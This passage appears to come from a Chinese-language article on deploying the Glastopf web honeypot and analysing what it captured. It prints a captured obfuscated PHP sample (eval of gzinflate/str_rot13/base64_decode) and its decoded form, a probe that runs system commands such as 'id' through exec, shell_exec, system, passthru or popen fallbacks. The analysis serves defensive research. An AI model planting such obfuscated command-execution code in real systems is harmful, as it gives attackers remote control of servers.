Glastopf可以将攻击信息分为几类记录到MySQL数据库中，蜜罐作者根据捕获信息，分别定义了数据库表结构，在主机安装好MySQL数据库后，可以将structure目录下sql文件导入到命名为Glastopf的数据库中，这样就可以将有价值的数据输出至数据库中，便于分析。为了对攻击数据进行更好展现，Glaos项目组成员开发了针对Glastopf的Web UI 程序Glasif，用户只需要再安装Apache服务，配置相关的Glasif脚本，就可以访问到Glasif界面。

　　通过对捕获日志进行分析，我们发现每天至少捕获了十几次攻击事件，包括网络中大量存在的Web应用漏洞扫描器探测扫描。攻击数据均存储在/root/Glastopf/files文件夹下。通过Glasif，能够对Glastopf捕获攻击数据进行很直观的查看和分析，并对一些数据，例如域名、攻击IP、攻击来源进行分类统计，下图统计了被攻击者利用的域名列表（这些被利用的域名都是黑客用来存储恶意脚本的，可能是黑客自己架设的服务器，也可能是被攻陷的某个网站服务器域名）：

图6 被利用域名情况统计

　　蜜罐获取的Web攻击文件列表如下所示：

图7 捕获文件地址统计

　　Glastopf给每个捕获文件都进行MD5哈希运算，这样可以保证记录的文件不重复。

　　4.2 两个攻击样本分析

　　在所有捕获的数据中，抽取了两个典型的攻击样本，其中捕获的一个样本文件如下：

　　<?php^M$vopcrew = "pZLNd8MwEITvgbyDIgyWIZT059Q0xdB
　　YYg30TRCOvIpIecl15cYh5N0ryWTSUCCH3sTMzrfDosQgTJF8/b7mH5/
　　L6QRRcgj9TLRi9mT3srGv9CwafEEMjk0immVSSBnfgLDtR0
　　OgdMHJxtTF8spnIjstnDKaxDkJ2cGnLYQO
　　duonlCR5Blrr9oMdfCXZGOPQK2fIRehOpNHNwzMOzwMo
　　LD4Bv43SjH52bTaOvkeNYw2IFdQ1v2BCjPyiD4VhQ/
　　booDkVMxuOrrCOhUM+S3TIyPdQW2NcGO1Ae1Gc9
　　SLokosaCs1hrHkLUUrZ7urS0fz32lwh90TTTAEskQ
　　HRmhb0Y2t3dvb3dzR8il2ld2CzXIKRPpJy5ECif+fD0k9Eb
　　Wh+v2trypbkGMqK2mCgx9VeseA6q3AoK
　　L8=";^Meval(gzinflate(str_rot13(base64_decode($vopcrew))));
　　^Mexit;

　　可以看到该文件是一个P H P 文件，其内容经过了gzinflate、str_rot13、base64_decode三个函数的处理之后，再通过eval执行。很明显，我们在这个文件中添加一行输出语句，就能看到解码后的文件内容，经过整理后如下所示：

　　<html>
　　<?php
　　$os = @PHP_OS;//获取系统
　　echo "v0pCr3w<br>";
　　echo "os:$os<br>";
　　$cmd="id";
　　$eseguicmd=exec($cmd); //执行命令
　　echo $eseguicmd;
　　function exec($cfe){
　　$res = '';
　　if (!empty($cfe)){
　　if(function_exists('exec')){
　　@exec($cfe,$res);
　　$res = join("\n",$res); //如果$res是空，一行一个组成数组
　　}
　　elseif(function_exists('shell_exec')){
　　$res = @shell_exec($cfe);
　　}//shell_exec执行$cfe
　　elseif(function_exists('system')){
　　@ob_start();
　　@system($cfe);
　　$res = @ob_get_contents();
　　@ob_end_clean();//system命令执行$cfe（系统某个信息）
　　}
　　elseif(function_exists('passthru')){
　　@ob_start();
　　@passthru($cfe);
　　$res = @ob_get_contents();
　　@ob_end_clean();//passthru计数返回contents 然后clean
　　}
　　elseif(@is_resource($f = @popen($cfe,"r"))){
　　$res = "";
　　while(!@feof($f)) { $res .= @fread($f,1024); }
　　@pclose($f);
　　}}//可读r模式查看$cfe并且每1204接一次包
　　return $res;
　　}
　　?>
　　</html>